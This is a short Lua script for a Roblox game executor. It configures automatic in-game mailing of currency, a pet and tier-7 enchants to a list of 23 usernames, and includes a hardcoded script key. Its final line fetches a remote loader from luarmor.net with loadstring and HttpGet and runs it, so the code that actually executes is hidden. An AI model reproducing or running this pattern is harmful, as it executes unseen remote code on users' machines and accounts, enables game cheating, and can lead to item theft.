script_key = "MqecHedshHEVyKwajNZtPvbdLkZceNYP";
_G.DISABLE_OVERLAY = true
_G.GDRY_RUN = false
_G.GMAIL_ITEMS = {
["Diamonds"] = {Class = "Currency", Id = "Diamonds", Amount = "5m"},
["Blooming Axolotl"] = {Class = "Pet", Id = "Blooming Axolotl", Amount = 115, IsGold = false, IsRainbow = true, IsShiny = false},
["Strong Pets"] = {Class = "Enchant",Id = "Strong Pets",Tier = 7, Amount = 1},
["Lucky Eggs"] = {Class = "Enchant",Id = "Lucky Eggs",Tier = 7, Amount = 1},
["Criticals"] = {Class = "Enchant",Id = "Criticals",Tier = 7, Amount = 1},
["Treasure Hunter"] = {Class = "Enchant",Id = "Treasure Hunter",Tier = 7, Amount = 1},
["Tap Power"] = {Class = "Enchant",Id = "Tap Power",Tier = 7, Amount = 1},
}
_G.GMAIL_RECEIVERS = {
"JieEast0nHenry2017",
"SACHIK0_Fr3d",
"GarethBlake200410",
"P3ngClara2017",
"Ma0Ig0r2013",
"Ka3d3C0dy",
"EliseDawn2010",
"ShanBobEdwin",
"WuIgorBoyd",
"BeckyFallonDominic",
"XinBob90",
"IchiroDallasGene",
"WuDanielleCalvin",
"AbbyBlair69",
"GUO_Barry2007",
"EikoEdmund27",
"CarlaGene44",
"BRIAN_Francis19",
"Hir0shiB0nni3",
"GangGaryBrian",
"EliHolly77",
"CalvinDan2024",
"Ir3n3Ang3licaAnn",
}

_G.GMAIL_DELAY  = 0
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/8f386eb537ee7b37a8f0ad37fe6dbc60.lua"))()
